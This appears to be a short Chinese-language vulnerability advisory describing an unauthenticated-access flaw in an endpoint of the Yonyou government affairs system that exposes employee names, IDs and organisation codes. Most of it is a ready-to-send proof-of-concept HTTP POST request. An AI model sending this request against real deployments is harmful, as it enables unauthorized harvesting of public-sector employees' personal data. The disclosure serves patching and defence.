用友政务系统 /ma/emp/api/seletMaEmpListForPrsCalc 未授权访问漏洞

2026-05-09 用友政务系统 PoC Public

Description

用友政务系统是用友网络科技股份有限公司专为政府机构和行政事业单位打造的一体化政务管理平台,涵盖预算管理、财务管理、人事管理、工资管理、资产管理和决策支持等核心业务模块,支持多级财政、多部门协同的复杂政务场景,广泛应用于各级政府部门、行政事业单位和公共机构。该系统 /ma/emp/api/seletMaEmpListForPrsCalc 接口存在未授权访问漏洞,未经身份认证的攻击者可直接访问该接口获取系统中的员工信息(包括员工编号、姓名、性别、组织机构代码等敏感数据),造成信息泄露。

PoC

POST /ma/emp/api/seletMaEmpListForPrsCalc HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 26
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

{"pageNum":1,"pageSize":1}

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities